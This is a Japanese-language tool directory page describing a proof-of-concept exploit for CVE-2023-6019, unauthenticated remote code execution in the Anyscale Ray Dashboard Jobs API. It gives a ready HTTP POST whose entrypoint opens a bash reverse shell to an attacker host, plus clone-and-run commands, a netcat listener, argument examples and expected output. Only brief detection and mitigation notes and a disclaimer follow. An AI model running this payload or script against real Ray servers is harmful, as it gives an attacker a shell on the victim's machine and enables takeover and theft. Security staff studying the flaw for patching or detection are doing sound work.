Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-6019 — CVE-2023-6019 の PoC エクスプロイト。Anyscale Ray Dashboard の Jobs API を介した認証されていないリモートコード実行を標的とします。脆弱な Ray インスタンス (< 2.6.4) にリバースシェルを配信します。 | Kitploit
ツール/GitHubGitHub/joaquinrrr/cve-2023-6019
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubjoaquinrrr/cve-2023-6019

CVE-2023-6019

CVE-2023-6019 の PoC エクスプロイト。Anyscale Ray Dashboard の Jobs API を介した認証されていないリモートコード実行を標的とします。脆弱な Ray インスタンス (< 2.6.4) にリバースシェルを配信します。

リポジトリを見る
6213ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-6019 - Anyscale Ray Dashboard の未認証 RCE

CVE-2023-6019 の PoC エクスプロイト — 未認証の Ray Dashboard Jobs API を介したリモートコード実行。
作成者: oguiii


説明

Anyscale Ray は、分散型 ML/AI ワークロードのためのオープンソースフレームワークです。2.6.4 より前のバージョンでは、Ray Dashboard(デフォルトポート 8265)を通じてジョブ提出 API が認証なしで公開されており、未認証の攻撃者は任意のジョブを提出して、ホスト上でリモートコード実行を達成できます。

  • CVE: CVE-2023-6019
  • 重要度: 緊急 (CVSS 9.8)
  • 影響を受けるバージョン: Ray < 2.6.4
  • 修正バージョン: Ray 2.6.4
  • 攻撃ベクトル: ネットワーク(未認証の HTTP リクエスト)

仕組み

/api/jobs/ エンドポイントは、entrypoint フィールドを含む JSON ペイロードを受け入れ、そのフィールドは Ray ワーカープロセスによってシェルコマンドとして実行されます — 認証情報は不要です。

POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}

使用方法

git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>

引数

Flag説明デフォルト
-t対象の IP またはホスト名必須
-pRay Dashboard のポート8265
-l攻撃者の IP(リバースシェル)必須
-lp攻撃者のポート(リバースシェル)必須

例

# Start listener
nc -lvnp 4444

# Run exploit
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444

想定される出力

[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version     : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019

[*] Target        : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...

[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc

[>] Make sure your listener is ready:
    nc -lvnp 4444

検出

HTTP ログまたはネットワークトラフィックで、ポート 8265 の /api/jobs/ に対する不審な POST リクエストを探してください。


緩和策

  • Ray >= 2.6.4 にアップグレードする
  • ファイアウォールルールで Ray Dashboard のポート(8265)へのアクセスを制限する
  • Ray Dashboard をパブリックネットワークに公開しない

参照

  • https://nvd.nist.gov/vuln/detail/CVE-2023-6019
  • https://www.anyscale.com/
  • https://github.com/ray-project/ray

免責事項

このツールは認可されたペネトレーションテストおよび教育目的のみを意図しています。
作者は、このツールによって引き起こされた誤用や損害について一切責任を負いません。
テスト前に必ず適切な書面による許可を取得してください。

ツールをダウンロード